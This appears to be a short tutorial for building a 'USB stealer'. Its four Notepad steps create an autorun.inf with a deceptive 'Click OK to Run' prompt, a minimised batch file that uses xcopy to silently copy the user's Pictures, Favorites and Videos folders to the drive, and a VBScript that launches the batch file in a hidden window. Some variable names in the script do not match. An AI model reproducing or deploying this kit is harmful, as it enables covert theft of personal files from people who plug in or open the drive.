STEP # 1
Open Notepad (I recommend Notepad++) and copy-paste the following lines.
[autorun]
icon=[Link]
open=[Link]
action=Click OK to Run
shell\open\command=[Link]
Save this as [Link]
STEP # 2
Open Notepad again and copy-paste the following lines
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics"
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\all\Favorites"
%backupcmd% "%USERPROFILE%\videos" "%drive%\all\vids"
@echo off
cls
Save this as [Link]
STEP # 3
Open Notepad once again and copy-paste the following line.
CreateObject("[Link]").Run """" & [Link](0) & """", 0, False
Save this as [Link]
STEP # 4
Open Notepad one last time and copy-paste the following line.
[Link] \[Link] [Link]
Save this as [Link]